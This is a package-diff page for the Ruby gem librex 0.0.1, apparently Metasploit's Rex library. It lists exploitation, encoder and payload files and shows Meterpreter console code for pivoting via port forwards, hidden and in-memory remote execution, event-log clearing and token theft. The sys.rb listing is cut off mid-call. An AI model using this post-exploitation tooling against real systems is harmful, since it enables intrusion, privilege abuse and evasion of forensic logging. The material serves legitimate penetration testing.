RubyGems - librex - Versions diffs - 0.0.1 - Mend

librex 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (370) hide show

data/README +4 -0
data/lib/rex.rb +101 -0
data/lib/rex.rb.ts.rb +70 -0
data/lib/rex/LICENSE +29 -0
data/lib/rex/arch.rb +103 -0
data/lib/rex/arch/sparc.rb +75 -0
data/lib/rex/arch/sparc.rb.ut.rb +18 -0
data/lib/rex/arch/x86.rb +513 -0
data/lib/rex/arch/x86.rb.ut.rb +93 -0
data/lib/rex/assembly/nasm.rb +100 -0
data/lib/rex/assembly/nasm.rb.ut.rb +22 -0
data/lib/rex/codepage.map +104 -0
data/lib/rex/compat.rb +281 -0
data/lib/rex/constants.rb +113 -0
data/lib/rex/elfparsey.rb +11 -0
data/lib/rex/elfparsey/elf.rb +123 -0
data/lib/rex/elfparsey/elfbase.rb +260 -0
data/lib/rex/elfparsey/exceptions.rb +27 -0
data/lib/rex/elfscan.rb +12 -0
data/lib/rex/elfscan/scanner.rb +207 -0
data/lib/rex/elfscan/search.rb +46 -0
data/lib/rex/encoder/alpha2.rb +31 -0
data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
data/lib/rex/encoder/alpha2/generic.rb +113 -0
data/lib/rex/encoder/alpha2/unicode_mixed.rb +117 -0
data/lib/rex/encoder/alpha2/unicode_upper.rb +129 -0
data/lib/rex/encoder/ndr.rb +89 -0
data/lib/rex/encoder/ndr.rb.ut.rb +44 -0
data/lib/rex/encoder/nonalpha.rb +61 -0
data/lib/rex/encoder/nonupper.rb +64 -0
data/lib/rex/encoder/xdr.rb +106 -0
data/lib/rex/encoder/xdr.rb.ut.rb +29 -0
data/lib/rex/encoder/xor.rb +69 -0
data/lib/rex/encoder/xor/dword.rb +13 -0
data/lib/rex/encoder/xor/dword_additive.rb +13 -0
data/lib/rex/encoders/xor_dword.rb +35 -0
data/lib/rex/encoders/xor_dword_additive.rb +53 -0
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +12 -0
data/lib/rex/encoding/xor.rb +20 -0
data/lib/rex/encoding/xor.rb.ts.rb +14 -0
data/lib/rex/encoding/xor/byte.rb +15 -0
data/lib/rex/encoding/xor/byte.rb.ut.rb +21 -0
data/lib/rex/encoding/xor/dword.rb +21 -0
data/lib/rex/encoding/xor/dword.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/dword_additive.rb +92 -0
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/exceptions.rb +17 -0
data/lib/rex/encoding/xor/generic.rb +146 -0
data/lib/rex/encoding/xor/generic.rb.ut.rb +120 -0
data/lib/rex/encoding/xor/qword.rb +15 -0
data/lib/rex/encoding/xor/word.rb +21 -0
data/lib/rex/encoding/xor/word.rb.ut.rb +13 -0
data/lib/rex/exceptions.rb +275 -0
data/lib/rex/exceptions.rb.ut.rb +44 -0
data/lib/rex/exploitation/cmdstager.rb +133 -0
data/lib/rex/exploitation/egghunter.rb +143 -0
data/lib/rex/exploitation/egghunter.rb.ut.rb +25 -0
data/lib/rex/exploitation/encryptjs.rb +77 -0
data/lib/rex/exploitation/heaplib.js.b64 +331 -0
data/lib/rex/exploitation/heaplib.rb +94 -0
data/lib/rex/exploitation/javascriptosdetect.rb +735 -0
data/lib/rex/exploitation/obfuscatejs.rb +335 -0
data/lib/rex/exploitation/opcodedb.rb +818 -0
data/lib/rex/exploitation/opcodedb.rb.ut.rb +279 -0
data/lib/rex/exploitation/seh.rb +92 -0
data/lib/rex/exploitation/seh.rb.ut.rb +19 -0
data/lib/rex/file.rb +84 -0
data/lib/rex/file.rb.ut.rb +16 -0
data/lib/rex/image_source.rb +12 -0
data/lib/rex/image_source/disk.rb +60 -0
data/lib/rex/image_source/image_source.rb +46 -0
data/lib/rex/image_source/memory.rb +37 -0
data/lib/rex/io/bidirectional_pipe.rb +157 -0
data/lib/rex/io/datagram_abstraction.rb +35 -0
data/lib/rex/io/stream.rb +313 -0
data/lib/rex/io/stream_abstraction.rb +186 -0
data/lib/rex/io/stream_server.rb +211 -0
data/lib/rex/job_container.rb +202 -0
data/lib/rex/logging.rb +4 -0
data/lib/rex/logging/log_dispatcher.rb +179 -0
data/lib/rex/logging/log_sink.rb +42 -0
data/lib/rex/logging/sinks/flatfile.rb +55 -0
data/lib/rex/logging/sinks/stderr.rb +43 -0
data/lib/rex/machparsey.rb +9 -0
data/lib/rex/machparsey/exceptions.rb +34 -0
data/lib/rex/machparsey/mach.rb +209 -0
data/lib/rex/machparsey/machbase.rb +408 -0
data/lib/rex/machscan.rb +9 -0
data/lib/rex/machscan/scanner.rb +217 -0
data/lib/rex/mime.rb +9 -0
data/lib/rex/mime/header.rb +75 -0
data/lib/rex/mime/message.rb +112 -0
data/lib/rex/mime/part.rb +20 -0
data/lib/rex/nop/opty2.rb +108 -0
data/lib/rex/nop/opty2.rb.ut.rb +23 -0
data/lib/rex/nop/opty2_tables.rb +300 -0
data/lib/rex/ole.rb +128 -0
data/lib/rex/ole/clsid.rb +47 -0
data/lib/rex/ole/difat.rb +141 -0
data/lib/rex/ole/directory.rb +230 -0
data/lib/rex/ole/direntry.rb +240 -0
data/lib/rex/ole/fat.rb +99 -0
data/lib/rex/ole/header.rb +204 -0
data/lib/rex/ole/minifat.rb +77 -0
data/lib/rex/ole/samples/create_ole.rb +27 -0
data/lib/rex/ole/samples/dir.rb +35 -0
data/lib/rex/ole/samples/dump_stream.rb +34 -0
data/lib/rex/ole/samples/ole_info.rb +23 -0
data/lib/rex/ole/storage.rb +395 -0
data/lib/rex/ole/stream.rb +53 -0
data/lib/rex/ole/substorage.rb +49 -0
data/lib/rex/ole/util.rb +157 -0
data/lib/rex/parser/arguments.rb +97 -0
data/lib/rex/parser/arguments.rb.ut.rb +67 -0
data/lib/rex/parser/ini.rb +185 -0
data/lib/rex/parser/ini.rb.ut.rb +29 -0
data/lib/rex/parser/nmap_xml.rb +111 -0
data/lib/rex/payloads.rb +1 -0
data/lib/rex/payloads/win32.rb +2 -0
data/lib/rex/payloads/win32/common.rb +26 -0
data/lib/rex/payloads/win32/kernel.rb +53 -0
data/lib/rex/payloads/win32/kernel/common.rb +54 -0
data/lib/rex/payloads/win32/kernel/migration.rb +12 -0
data/lib/rex/payloads/win32/kernel/recovery.rb +50 -0
data/lib/rex/payloads/win32/kernel/stager.rb +171 -0
data/lib/rex/peparsey.rb +12 -0
data/lib/rex/peparsey/exceptions.rb +32 -0
data/lib/rex/peparsey/pe.rb +188 -0
data/lib/rex/peparsey/pe_memdump.rb +63 -0
data/lib/rex/peparsey/pebase.rb +1655 -0
data/lib/rex/peparsey/section.rb +136 -0
data/lib/rex/pescan.rb +13 -0
data/lib/rex/pescan/analyze.rb +309 -0
data/lib/rex/pescan/scanner.rb +206 -0
data/lib/rex/pescan/search.rb +56 -0
data/lib/rex/platforms.rb +1 -0
data/lib/rex/platforms/windows.rb +51 -0
data/lib/rex/poly.rb +132 -0
data/lib/rex/poly/block.rb +468 -0
data/lib/rex/poly/register.rb +100 -0
data/lib/rex/poly/register/x86.rb +40 -0
data/lib/rex/post.rb +8 -0
data/lib/rex/post/dir.rb +51 -0
data/lib/rex/post/file.rb +172 -0
data/lib/rex/post/file_stat.rb +220 -0
data/lib/rex/post/gen.pl +13 -0
data/lib/rex/post/io.rb +182 -0
data/lib/rex/post/meterpreter.rb +4 -0
data/lib/rex/post/meterpreter/channel.rb +438 -0
data/lib/rex/post/meterpreter/channel_container.rb +54 -0
data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
data/lib/rex/post/meterpreter/client.rb +335 -0
data/lib/rex/post/meterpreter/client_core.rb +274 -0
data/lib/rex/post/meterpreter/dependencies.rb +3 -0
data/lib/rex/post/meterpreter/extension.rb +32 -0
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +21 -0
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +104 -0
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +28 -0
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +100 -0
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +24 -0
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +333 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +273 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +235 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +103 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +144 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +73 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +56 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +137 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +192 -0
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +139 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +184 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +61 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +361 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +279 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +182 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +174 -0
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +185 -0
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +227 -0
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
data/lib/rex/post/meterpreter/packet.rb +596 -0
data/lib/rex/post/meterpreter/packet_dispatcher.rb +409 -0
data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
data/lib/rex/post/meterpreter/ui/console.rb +135 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +62 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +595 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +241 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +61 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +98 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +51 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +132 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +187 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +63 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +376 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +270 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +484 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +315 -0
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +95 -0
data/lib/rex/post/permission.rb +26 -0
data/lib/rex/post/process.rb +57 -0
data/lib/rex/post/thread.rb +57 -0
data/lib/rex/post/ui.rb +52 -0
data/lib/rex/proto.rb +12 -0
data/lib/rex/proto.rb.ts.rb +8 -0
data/lib/rex/proto/dcerpc.rb +6 -0
data/lib/rex/proto/dcerpc.rb.ts.rb +9 -0
data/lib/rex/proto/dcerpc/client.rb +358 -0
data/lib/rex/proto/dcerpc/client.rb.ut.rb +491 -0
data/lib/rex/proto/dcerpc/exceptions.rb +150 -0
data/lib/rex/proto/dcerpc/handle.rb +47 -0
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +85 -0
data/lib/rex/proto/dcerpc/ndr.rb +72 -0
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +41 -0
data/lib/rex/proto/dcerpc/packet.rb +253 -0
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +56 -0
data/lib/rex/proto/dcerpc/response.rb +186 -0
data/lib/rex/proto/dcerpc/response.rb.ut.rb +15 -0
data/lib/rex/proto/dcerpc/uuid.rb +84 -0
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +46 -0
data/lib/rex/proto/drda.rb +5 -0
data/lib/rex/proto/drda.rb.ts.rb +17 -0
data/lib/rex/proto/drda/constants.rb +49 -0
data/lib/rex/proto/drda/constants.rb.ut.rb +23 -0
data/lib/rex/proto/drda/packet.rb +252 -0
data/lib/rex/proto/drda/packet.rb.ut.rb +109 -0
data/lib/rex/proto/drda/utils.rb +123 -0
data/lib/rex/proto/drda/utils.rb.ut.rb +84 -0
data/lib/rex/proto/http.rb +5 -0
data/lib/rex/proto/http.rb.ts.rb +12 -0
data/lib/rex/proto/http/client.rb +817 -0
data/lib/rex/proto/http/client.rb.ut.rb +93 -0
data/lib/rex/proto/http/handler.rb +46 -0
data/lib/rex/proto/http/handler/erb.rb +128 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb +21 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +1 -0
data/lib/rex/proto/http/handler/proc.rb +54 -0
data/lib/rex/proto/http/handler/proc.rb.ut.rb +24 -0
data/lib/rex/proto/http/header.rb +161 -0
data/lib/rex/proto/http/header.rb.ut.rb +46 -0
data/lib/rex/proto/http/packet.rb +394 -0
data/lib/rex/proto/http/packet.rb.ut.rb +165 -0
data/lib/rex/proto/http/request.rb +356 -0
data/lib/rex/proto/http/request.rb.ut.rb +214 -0
data/lib/rex/proto/http/response.rb +85 -0
data/lib/rex/proto/http/response.rb.ut.rb +149 -0
data/lib/rex/proto/http/server.rb +367 -0
data/lib/rex/proto/http/server.rb.ut.rb +79 -0
data/lib/rex/proto/smb.rb +7 -0
data/lib/rex/proto/smb.rb.ts.rb +8 -0
data/lib/rex/proto/smb/client.rb +1733 -0
data/lib/rex/proto/smb/client.rb.ut.rb +223 -0
data/lib/rex/proto/smb/constants.rb +1062 -0
data/lib/rex/proto/smb/constants.rb.ut.rb +18 -0
data/lib/rex/proto/smb/crypt.rb +95 -0
data/lib/rex/proto/smb/crypt.rb.ut.rb +20 -0
data/lib/rex/proto/smb/evasions.rb +65 -0
data/lib/rex/proto/smb/exceptions.rb +846 -0
data/lib/rex/proto/smb/simpleclient.rb +292 -0
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +128 -0
data/lib/rex/proto/smb/utils.rb +514 -0
data/lib/rex/proto/smb/utils.rb.ut.rb +20 -0
data/lib/rex/proto/sunrpc.rb +1 -0
data/lib/rex/proto/sunrpc/client.rb +195 -0
data/lib/rex/script.rb +42 -0
data/lib/rex/script/base.rb +59 -0
data/lib/rex/script/meterpreter.rb +9 -0
data/lib/rex/script/shell.rb +9 -0
data/lib/rex/service.rb +48 -0
data/lib/rex/service_manager.rb +141 -0
data/lib/rex/service_manager.rb.ut.rb +32 -0
data/lib/rex/services/local_relay.rb +423 -0
data/lib/rex/socket.rb +586 -0
data/lib/rex/socket.rb.ut.rb +86 -0
data/lib/rex/socket/comm.rb +119 -0
data/lib/rex/socket/comm/local.rb +409 -0
data/lib/rex/socket/comm/local.rb.ut.rb +75 -0
data/lib/rex/socket/ip.rb +129 -0
data/lib/rex/socket/parameters.rb +345 -0
data/lib/rex/socket/parameters.rb.ut.rb +51 -0
data/lib/rex/socket/range_walker.rb +295 -0
data/lib/rex/socket/range_walker.rb.ut.rb +55 -0
data/lib/rex/socket/ssl_tcp.rb +184 -0
data/lib/rex/socket/ssl_tcp.rb.ut.rb +39 -0
data/lib/rex/socket/ssl_tcp_server.rb +122 -0
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +51 -0
data/lib/rex/socket/subnet_walker.rb +75 -0
data/lib/rex/socket/subnet_walker.rb.ut.rb +28 -0
data/lib/rex/socket/switch_board.rb +272 -0
data/lib/rex/socket/switch_board.rb.ut.rb +52 -0
data/lib/rex/socket/tcp.rb +76 -0
data/lib/rex/socket/tcp.rb.ut.rb +64 -0
data/lib/rex/socket/tcp_server.rb +67 -0
data/lib/rex/socket/tcp_server.rb.ut.rb +44 -0
data/lib/rex/socket/udp.rb +157 -0
data/lib/rex/socket/udp.rb.ut.rb +44 -0
data/lib/rex/struct2.rb +5 -0
data/lib/rex/struct2/c_struct.rb +181 -0
data/lib/rex/struct2/c_struct_template.rb +39 -0
data/lib/rex/struct2/constant.rb +26 -0
data/lib/rex/struct2/element.rb +44 -0
data/lib/rex/struct2/generic.rb +73 -0
data/lib/rex/struct2/restraint.rb +54 -0
data/lib/rex/struct2/s_string.rb +72 -0
data/lib/rex/struct2/s_struct.rb +111 -0
data/lib/rex/sync.rb +6 -0
data/lib/rex/sync/event.rb +94 -0
data/lib/rex/sync/read_write_lock.rb +176 -0
data/lib/rex/sync/ref.rb +57 -0
data/lib/rex/sync/thread_safe.rb +82 -0
data/lib/rex/test.rb +35 -0
data/lib/rex/text.rb +1029 -0
data/lib/rex/text.rb.ut.rb +168 -0
data/lib/rex/time.rb +65 -0
data/lib/rex/transformer.rb +115 -0
data/lib/rex/transformer.rb.ut.rb +38 -0
data/lib/rex/ui.rb +21 -0
data/lib/rex/ui/interactive.rb +252 -0
data/lib/rex/ui/output.rb +80 -0
data/lib/rex/ui/output/none.rb +18 -0
data/lib/rex/ui/progress_tracker.rb +96 -0
data/lib/rex/ui/subscriber.rb +149 -0
data/lib/rex/ui/text/color.rb +97 -0
data/lib/rex/ui/text/color.rb.ut.rb +18 -0
data/lib/rex/ui/text/dispatcher_shell.rb +382 -0
data/lib/rex/ui/text/input.rb +117 -0
data/lib/rex/ui/text/input/buffer.rb +75 -0
data/lib/rex/ui/text/input/readline.rb +129 -0
data/lib/rex/ui/text/input/socket.rb +95 -0
data/lib/rex/ui/text/input/stdio.rb +45 -0
data/lib/rex/ui/text/irb_shell.rb +55 -0
data/lib/rex/ui/text/output.rb +80 -0
data/lib/rex/ui/text/output/buffer.rb +65 -0
data/lib/rex/ui/text/output/file.rb +37 -0
data/lib/rex/ui/text/output/socket.rb +43 -0
data/lib/rex/ui/text/output/stdio.rb +40 -0
data/lib/rex/ui/text/progress_tracker.rb +56 -0
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +34 -0
data/lib/rex/ui/text/shell.rb +321 -0
data/lib/rex/ui/text/table.rb +254 -0
data/lib/rex/ui/text/table.rb.ut.rb +55 -0
data/lib/rex/zip.rb +93 -0
data/lib/rex/zip/archive.rb +91 -0
data/lib/rex/zip/blocks.rb +182 -0
data/lib/rex/zip/entry.rb +95 -0
data/lib/rex/zip/samples/comment.rb +32 -0
data/lib/rex/zip/samples/mkwar.rb +138 -0
data/lib/rex/zip/samples/mkzip.rb +19 -0
data/lib/rex/zip/samples/recursive.rb +58 -0
metadata +435 -0

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb ADDED

@@ -0,0 +1,270 @@
+require 'rex/post/meterpreter'
+require 'rex/service_manager'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# The networking portion of the standard API extension.
+#
+###
+class Console::CommandDispatcher::Stdapi::Net
+	Klass = Console::CommandDispatcher::Stdapi::Net
+	include Console::CommandDispatcher
+	#
+	# This module is used to extend the meterpreter session
+	# so that local port forwards can be tracked and cleaned
+	# up when the meterpreter session goes away
+	#
+	module PortForwardTracker
+		def cleanup
+			super
+			if pfservice
+				pfservice.deref
+			end
+		end
+		attr_accessor :pfservice
+	end
+	#
+	# Options for the route command.
+	#
+	@@route_opts = Rex::Parser::Arguments.new(
+		"-h" => [ false, "Help banner." ])
+	#
+	# Options for the portfwd command.
+	#
+	@@portfwd_opts = Rex::Parser::Arguments.new(
+		"-h" => [ false, "Help banner." ],
+		"-l" => [ true,  "The local port to listen on." ],
+		"-r" => [ true,  "The remote host to connect to." ],
+		"-p" => [ true,  "The remote port to connect to." ],
+		"-L" => [ true,  "The local host to listen on (optional)." ])
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"ipconfig" => "Display interfaces",
+			"route"    => "View and modify the routing table",
+			"portfwd"  => "Forward a local port to a remote service",
+		}
+	end
+	#
+	# Name for this dispatcher.
+	#
+	def name
+		"Stdapi: Networking"
+	end
+	#
+	# Displays interfaces on the remote machine.
+	#
+	def cmd_ipconfig(*args)
+		ifaces = client.net.config.interfaces
+		if (ifaces.length == 0)
+			print_line("No interfaces were found.")
+		else
+			client.net.config.each_interface { |iface|
+				print("\n" + iface.pretty + "\n")
+			}
+		end
+	end
+	#
+	# Displays or modifies the routing table on the remote machine.
+	#
+	def cmd_route(*args)
+		# Default to list
+		if (args.length == 0)
+			args.unshift("list")
+		end
+		# Check to see if they specified -h
+		@@route_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					print(
+						"Usage: route [-h] command [args]\n\n" +
+						"Display or modify the routing table on the remote machine.\n\n" +
+						"Supported commands:\n\n" +
+						"   add    [subnet] [netmask] [gateway]\n" +
+						"   delete [subnet] [netmask] [gateway]\n" +
+						"   list\n\n")
+					return true
+			end
+		}
+		cmd = args.shift
+		# Process the commands
+		case cmd
+			when "list"
+				routes = client.net.config.routes
+				if (routes.length == 0)
+					print_line("No routes were found.")
+				else
+					tbl = Rex::Ui::Text::Table.new(
+						'Header'  => "Network routes",
+						'Indent'  => 4,
+						'Columns' =>
+							[
+								"Subnet",
+								"Netmask",
+								"Gateway"
+							])
+					routes.each { |route|
+						tbl << [ route.subnet, route.netmask, route.gateway ]
+					}
+					print("\n" + tbl.to_s + "\n")
+				end
+			when "add"
+				print_line("Creating route #{args[0]}/#{args[1]} -> #{args[2]}")
+				client.net.config.add_route(*args)
+			when "delete"
+				print_line("Deleting route #{args[0]}/#{args[1]} -> #{args[2]}")
+				client.net.config.remove_route(*args)
+			else
+				print_error("Unsupported command: #{cmd}")
+		end
+	end
+	#
+	# Starts and stops local port forwards to remote hosts on the target
+	# network.  This provides an elementary pivoting interface.
+	#
+	def cmd_portfwd(*args)
+		args.unshift("list") if args.empty?
+		# For clarity's sake.
+		lport = nil
+		lhost = nil
+		rport = nil
+		rhost = nil
+		# Parse the options
+		@@portfwd_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-h"
+					print(
+						"Usage: portfwd [-h] [add / delete / list] [args]\n\n" +
+						@@portfwd_opts.usage)
+					return true
+				when "-l"
+					lport = val.to_i
+				when "-L"
+					lhost = val
+				when "-p"
+					rport = val.to_i
+				when "-r"
+					rhost = val
+			end
+		}
+		# If we haven't extended the session, then do it now since we'll
+		# need to track port forwards
+		if client.kind_of?(PortForwardTracker) == false
+			client.extend(PortForwardTracker)
+			client.pfservice = Rex::ServiceManager.start(Rex::Services::LocalRelay)
+		end
+		# Build a local port forward in association with the channel
+		service = client.pfservice
+		# Process the command
+		case args.shift
+			when "list"
+				cnt = 0
+				# Enumerate each TCP relay
+				service.each_tcp_relay { |lhost, lport, rhost, rport, opts|
+					next if (opts['MeterpreterRelay'] == nil)
+					print_line("#{cnt}: #{lhost}:#{lport} -> #{rhost}:#{rport}")
+					cnt += 1
+				}
+				print_line
+				print_line("#{cnt} total local port forwards.")
+			when "add"
+				# Validate parameters
+				if (!lport or !rhost or !rport)
+					print_error("You must supply a local port, remote host, and remote port.")
+					return
+				end
+				# Start the local TCP relay in association with this stream
+				service.start_tcp_relay(lport,
+					'LocalHost'         => lhost,
+					'PeerHost'          => rhost,
+					'PeerPort'          => rport,
+					'MeterpreterRelay'  => true,
+					'OnLocalConnection' => Proc.new { |relay, lfd|
+						create_tcp_channel(relay)
+						})
+				print_status("Local TCP relay created: #{lhost || '0.0.0.0'}:#{lport} <-> #{rhost}:#{rport}")
+			# Delete local port forwards
+			when "delete"
+				# No local port, no love.
+				if (!lport)
+					print_error("You must supply a local port.")
+					return
+				end
+				# Stop the service
+				if (service.stop_tcp_relay(lport, lhost))
+					print_status("Successfully stopped TCP relay on #{lhost || '0.0.0.0'}:#{lport}")
+				else
+					print_error("Failed to stop TCP relay on #{lhost || '0.0.0.0'}:#{lport}")
+				end
+		end
+	end
+protected
+	#
+	# Creates a TCP channel using the supplied relay context.
+	#
+	def create_tcp_channel(relay)
+		client.net.socket.create(
+			Rex::Socket::Parameters.new(
+				'PeerHost' => relay.opts['PeerHost'],
+				'PeerPort' => relay.opts['PeerPort'],
+				'Proto'    => 'tcp'
+			)
+		)
+	end
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb ADDED

@@ -0,0 +1,484 @@
+require 'rex/post/meterpreter'
+module Rex
+module Post
+module Meterpreter
+module Ui
+###
+#
+# The system level portion of the standard API extension.
+#
+###
+class Console::CommandDispatcher::Stdapi::Sys
+	Klass = Console::CommandDispatcher::Stdapi::Sys
+	include Console::CommandDispatcher
+	#
+	# Options used by the 'execute' command.
+	#
+	@@execute_opts = Rex::Parser::Arguments.new(
+		"-a" => [ true,  "The arguments to pass to the command."                   ],
+		"-c" => [ false, "Channelized I/O (required for interaction)."             ],
+		"-f" => [ true,  "The executable command to run."                          ],
+		"-h" => [ false, "Help menu."                                              ],
+		"-H" => [ false, "Create the process hidden from view."                    ],
+		"-i" => [ false, "Interact with the process after creating it."            ],
+		"-m" => [ false, "Execute from memory."                                    ],
+		"-d" => [ true,  "The 'dummy' executable to launch when using -m."         ],
+		"-t" => [ false, "Execute process with currently impersonated thread token"],
+		"-k" => [ false, "Execute process on the meterpreters current desktop"     ],
+		"-s" => [ true,  "Execute process in a given session as the session user"  ])
+	#
+	# Options used by the 'reg' command.
+	#
+	@@reg_opts = Rex::Parser::Arguments.new(
+		"-d" => [ true,  "The data to store in the registry value."                ],
+		"-h" => [ true,  "Help menu."                                              ],
+		"-k" => [ true,  "The registry key path (E.g. HKLM\\Software\\Foo)."       ],
+		"-t" => [ true,  "The registry value type (E.g. REG_SZ)."                  ],
+		"-v" => [ true,  "The registry value name (E.g. Stuff)."                   ])
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"clearev"  => "Clear the event log",
+			"execute"  => "Execute a command",
+			"getpid"   => "Get the current process identifier",
+			"getuid"   => "Get the user that the server is running as",
+			"getprivs" => "Get as many privileges as possible",
+			"kill"     => "Terminate a process",
+			"ps"       => "List running processes",
+			"reboot"   => "Reboots the remote computer",
+			"reg"      => "Modify and interact with the remote registry",
+			"rev2self" => "Calls RevertToSelf() on the remote machine",
+			"sysinfo"  => "Gets information about the remote system, such as OS",
+			"shell"    => "Drop into a system command shell",
+			"shutdown" => "Shuts down the remote computer",
+			"steal_token" => "Attempts to steal an impersonation token from the target process",
+			"drop_token"  => "Relinquishes any active impersonation token.",
+		}
+	end
+	#
+	# Name for this dispatcher.
+	#
+	def name
+		"Stdapi: System"
+	end
+	#
+	# Executes a command with some options.
+	#
+	def cmd_execute(*args)
+		if (args.length == 0)
+			args.unshift("-h")
+		end
+		session     = nil
+		interact    = false
+		desktop     = false
+		channelized = nil
+		hidden      = nil
+		from_mem    = false
+		dummy_exec  = "cmd"
+		cmd_args    = nil
+		cmd_exec    = nil
+		use_thread_token = false
+		@@execute_opts.parse(args) { |opt, idx, val|
+			case opt
+				when "-a"
+					cmd_args = val
+				when "-c"
+					channelized = true
+				when "-f"
+					cmd_exec = val
+				when "-H"
+					hidden = true
+				when "-m"
+					from_mem = true
+				when "-d"
+					dummy_exec = val
+				when "-k"
+					desktop = true
+				when "-h"
+					print(
+						"Usage: execute -f file [options]\n\n" +
+						"Executes a command on the remote machine.\n" +
+						@@execute_opts.usage)
+					return true
+				when "-i"
+					channelized = true
+					interact = true
+				when "-t"
+					use_thread_token = true
+				when "-s"
+					session = val.to_i
+			end
+		}
+		# Did we at least get an executable?
+		if (cmd_exec == nil)
+			print_error("You must specify an executable file with -f")
+			return true
+		end
+		# Execute it
+		p = client.sys.process.execute(cmd_exec, cmd_args,
+			'Channelized' => channelized,
+			'Desktop'     => desktop,
+			'Session'     => session,
+			'Hidden'      => hidden,
